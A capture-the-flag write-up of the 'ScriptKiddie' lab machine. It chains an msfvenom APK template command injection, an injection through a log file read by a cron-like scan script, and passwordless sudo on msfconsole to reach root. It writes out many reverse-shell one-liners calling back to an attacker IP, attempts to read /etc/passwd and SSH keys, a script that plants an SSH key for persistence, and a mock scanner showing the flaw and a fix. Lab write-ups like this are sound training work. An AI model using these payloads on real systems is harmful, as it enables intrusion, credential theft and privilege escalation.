ScriptKiddie

Personal Rating: Medium


Last updated 1 year ago

nmap:

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5

Werkzeug is the Python WSGI toolkit behind Flask, so the site is a Python web application (Python 3.8.5 according to the banner).

I entered my own IP as the target of the site's nmap scan and confirmed with tcpdump -i tun0 src 10.10.10.226 that the server really sends traffic back to me, so the form drives a real scan.

That suggests OS commands are executed in the background, so I tried OS command injection.

With '10.10.16.6; ping 10.10.16.6' in the IP field of the scan form I received the ping, so it looked like a blind OS command injection. Only ping-based payloads ever had a visible effect, though, which in hindsight was a hint that this was not a real injection point.

Payloads that worked:

; ping 10.10.16.6
& ping 10.10.16.6

Payloads that did not work:

; a=$(cat /etc/passwd) && wget http://10.10.16.6:8000/$a
& nc -lnvp 4444 -e /bin/bash
; wget http://10.10.16.6:8000/test

; python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.6",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
; export RHOST="10.10.16.6";export RPORT=4444;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Searching for Werkzeug shows this:

Werkzeug - 'Debug Shell' Command Execution | multiple/remote/43905.py

I ported the script to Python 3, but it did not work. The /console endpoint does not exist on this server, which means the Werkzeug debugger is not enabled, so this exploit does not apply here.

Checking with Burp, the scan form sends a POST request:

ip=%3B+ping+10.10.16.6&action=scan

Changing the action parameter returns JSON output:

Since I was stuck, I switched to guided mode, which points at a command injection in msfvenom. I honestly did not think of this, but even exploitation tools can have vulnerabilities :)

Metasploit Framework 6.0.11 - msfvenom APK template command injection | multiple/local/49491.py

msfvenom RCE

I used the Exploit-DB script for it (/usr/share/exploitdb/exploits/multiple/local/49491.py) to build a malicious APK template with the command

'/bin/bash -c "bash -i >& /dev/tcp/10.10.16.6/4444 0>&1"'

in it, and uploaded that APK as the template for the site's msfvenom payload generator. When msfvenom processed the template the command ran, and I got a reverse shell as kid on my netcat listener.

Internal Enumeration

kid@scriptkiddie:/home$ id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
kid@scriptkiddie:/home$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Feb 3 2021 .
drwxr-xr-x 20 root root 4096 Feb 3 2021 ..
drwxr-xr-x 11 kid kid 4096 Feb 3 2021 kid
drwxr-xr-x 6 pwn pwn 4096 Feb 3 2021 pwn
kid@scriptkiddie:/home$ cd pwn
kid@scriptkiddie:/home/pwn$ ls
recon
scanlosers.sh
kid@scriptkiddie:/home/pwn$

There is another user, pwn, whose home directory holds interesting files: a recon directory and a script, scanlosers.sh.

The script runs an nmap scan against every IP listed in a log file and then clears the log.

ss -tlpn shows no additional listening ports.

I transferred linpeas and pspy64 to the host and ran them.

I added my public key to /home/kid/.ssh/authorized_keys so I could SSH in as kid.

I found the application source at /home/kid/html/app.py and had a look at it.

This part is interesting:

We control the "srcip" value through the request, and when the input is not a valid IP it is written to the file /home/kid/logs/hackers. As kid we can also write to that file directly, so the validation does not matter for us.

Combined with the script /home/pwn/scanlosers.sh, this lets us control which targets the script passes to nmap.

I could not find an obvious nmap vulnerability in the installed version that an attacker-controlled target could trigger.

I added this line to the hackers file:

127.0.0.1"; echo soos > sheesh.txt

To my surprise, the hackers file was empty after I left nano, and a file sheesh.txt owned by pwn had appeared in /home/pwn/, so the script had consumed my line and something had run as pwn.

Bash Injection

Let's try the same with a reverse shell:

127.0.0.1"; /bin/bash -c 'bash -i >& /dev/tcp/10.10.16.6/6666 0>&1'

The hackers file got cleared again, but I got no reverse shell.

sheesh.txt explains why: it contains nmap's own error output.

Failed to resolve "soos".
WARNING: No targets were specified, so 0 hosts scanned.

So the echo never ran. The " did not terminate any quoting; the script passed soos to nmap as a target, and the > sheesh.txt redirection applied to the nmap command itself, which is why the file was created and is owned by pwn. The payload has to fit into the command line the script builds rather than break out of a quoted string.

Failed payloads:

127.0.0.1; /bin/bash -c 'bash -i >& /dev/tcp/10.10.16.6/6666 0>&1" echo
127.0.0.1 && bash -i >& /dev/tcp/10.10.16.6/6666 0>&1" && echo "
127.0.0.1; bash -i >& /dev/tcp/10.10.16.6/6666 0>&1"; echo "
127.0.0.1 & bash -i >& /dev/tcp/10.10.16.6/6666 0>&1
127.0.0.1"; echo $(cat /home/pwn/.ssh/*) > sheesh.txt
127.0.0.1"; cp /home/pwn/.ssh/id_rsa ./id.txt
test test {touch,testtest.txt}
test test (sh)0>/dev/tcp/10.10.16.6/6666
test test a;{touch,testtest.txt};
test test a";(sh)0>/dev/tcp/10.10.16.6/6666;
test test a"; /tmp/exploit.sh;
test test a";/tmp/exploit.sh;
test test a;/tmp/exploit.sh;
test test a;/tmp/exploit.sh;"
test test a";{bash,/tmp/exploit.sh};
a a 127.0.0.1&{/bin/bash,/tmp/exploit.sh};
a a a;"/tmp/exploit.sh > sheesh.txt
a a /tmp/exploit.sh;"/tmp/exploit.sh > sheesh.txt
a a /bin/bash</tmp/exploit.sh;"/bin/bash</tmp/exploit.sh > sheesh.txt
a a a;"/tmp/exploit.sh;" > aua.txt
a a a;"/tmp/exploit.sh" > aua.txt
a a $(/tmp/exploit.sh)
a a $(../../../tmp/exploit.sh)

The script takes the target from the third space-delimited field of each line, so the payload has to start in the third field; that is what the two dummy fields a a in the payloads above and below are for. (The payload that eventually worked contains spaces after the third field, so the script evidently uses everything from the third field onward.)

I created a script /tmp/exploit.sh that drops my public key for pwn and calls back to my listener:

#!/bin/bash
# Drop my public key for pwn so I can SSH in later, then call back to my listener.
mkdir -p /home/pwn/.ssh
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ9c4Xx8Qqg8wzlum73FBbi2UDXvBLLnK4frGPMIzXat" > /home/pwn/.ssh/authorized_keys
chmod 700 /home/pwn/.ssh && chmod 600 /home/pwn/.ssh/authorized_keys
bash -i >& /dev/tcp/10.10.16.6/6666 0>&1
touch hacked.txt   # marker; only reached once the reverse shell exits

This payload finally gave me a reverse shell as the pwn user:

a a $(bash -c "bash -i >& /dev/tcp/10.10.16.6/6666 0>&1")

Two things made the difference. The injected text is spliced into a command line that a shell then parses, so wrapping the command in $() turns it into a command substitution that the shell evaluates before nmap is even started; in the earlier attempts my text just ended up as extra arguments to nmap. And /dev/tcp together with the >& redirection are bash features: if the script hands that command line to /bin/sh (dash on Ubuntu), a bare bash -i >& ... inside the substitution is a syntax error, so bash -c "..." makes sure bash interprets it.

The same injection would not execute my /tmp/exploit.sh script, and I did not find out why. In that situation it is worth checking whether the script is executable and whether the process running scanlosers.sh can see /tmp at all (a service started with a private /tmp does not share it).
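To see why the quoting attempts failed and why a a $(...) worked, here is a constructed mock of a log-driven scanner with the same shape. It is added for this writeup and is not the box's /home/pwn/scanlosers.sh (whose source is not reproduced here); the field handling, the sh -c call and the fake nmap are my assumptions. It reproduces the sheesh.txt effect described above and also shows a hardened variant that validates the field and never re-parses a command string.

```sh
#!/bin/sh
# Constructed mock of a log-driven scanner, added for illustration. It is NOT the
# box's /home/pwn/scanlosers.sh (whose source is not shown in this writeup).
# Assumptions: a log line looks like "<field1> <field2> <target...>", the target is
# taken from field 3 onward, and it is spliced unquoted into a string run by sh -c.

WORK=$(mktemp -d)
LOG="$WORK/hackers"
mkdir -p "$WORK/bin"

# Offline stand-in for nmap: it only reports the arguments it received.
cat > "$WORK/bin/nmap" <<'EOF'
#!/bin/sh
echo "fake-nmap: args=[$*]"
EOF
chmod +x "$WORK/bin/nmap"
PATH="$WORK/bin:$PATH"; export PATH

# Vulnerable pattern: the untrusted field becomes part of a shell command string.
run_scanner() {
    cd "$WORK" || return 1
    cut -d' ' -f3- "$LOG" | sort -u | while IFS= read -r ip; do
        sh -c "nmap --top-ports 10 ${ip}"
    done
    : > "$LOG"   # the real script also empties the log afterwards
}

# Hardened variant: take exactly one field, accept only dotted-quad characters,
# and pass it to nmap as an argument instead of re-parsing a command string.
safe_run_scanner() {
    cd "$WORK" || return 1
    cut -d' ' -f3 "$LOG" | sort -u | while IFS= read -r ip; do
        case "$ip" in
            ''|*[!0-9.]*) echo "rejected: $ip" >&2; continue ;;
        esac
        nmap --top-ports 10 "$ip"
    done
    : > "$LOG"
}

# The closing-quote attempt. Field 3 onward is 'soos > sheesh.txt', so the quote is
# an ordinary character, nmap gets 'soos' as its target and the redirection sends
# nmap's own output into sheesh.txt, which is what appeared on the box.
quote_payload() {
    rm -f "$WORK/sheesh.txt"
    printf '%s\n' '127.0.0.1"; echo soos > sheesh.txt' > "$LOG"
    run_scanner >/dev/null
    cat "$WORK/sheesh.txt"
}

# Command substitution starting in field 3: sh -c evaluates $(...) while parsing
# the command string, before nmap runs. (touch stands in for the reverse shell.)
subst_payload() {
    rm -f "$WORK/pwned.txt"
    printf '%s\n' 'a a $(touch pwned.txt)' > "$LOG"
    run_scanner >/dev/null
    if [ -f "$WORK/pwned.txt" ]; then echo executed; else echo not-executed; fi
}

# The same payload against the hardened scanner is rejected before anything runs.
subst_payload_hardened() {
    rm -f "$WORK/pwned.txt"
    printf '%s\n' 'a a $(touch pwned.txt)' > "$LOG"
    safe_run_scanner >/dev/null 2>&1
    if [ -f "$WORK/pwned.txt" ]; then echo executed; else echo not-executed; fi
}

echo "quote payload -> sheesh.txt contains: $(quote_payload)"
echo "subst payload -> $(subst_payload)"
echo "hardened      -> $(subst_payload_hardened)"
```

The mock makes the two lessons concrete: a quote character inside an interpolated value does nothing unless the string is parsed as quoted, while a $() substitution is executed by whichever shell re-parses the assembled command line. The fix is the usual one for this class of bug: validate the field against the shape you expect and pass it as a single argument, never through sh -c.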

Privilege Escalation

sudo -l reveals that the user pwn can execute /opt/metasploit-framework-6.0.9/msfconsole as root without a password.

I ran sudo /opt/metasploit-framework-6.0.9/msfconsole and started an interactive Ruby shell with irb, but that did not get me anywhere.

sudo /opt/metasploit-framework-6.0.9/msfconsole -x id showed me the output of id: -x runs console commands at startup, and msfconsole hands commands it does not recognise to the system shell, so this is the way to go. This gave a root shell:

sudo /opt/metasploit-framework-6.0.9/msfconsole -x 'bash -c "bash -i >& /dev/tcp/10.10.16.6/7777 0>&1"'

That completes the chain: the msfvenom APK template command injection (Exploit-DB 49491, /usr/share/exploitdb/exploits/multiple/local/49491.py) for the foothold as kid, the scanlosers.sh command injection for pwn, and the passwordless sudo on msfconsole for root.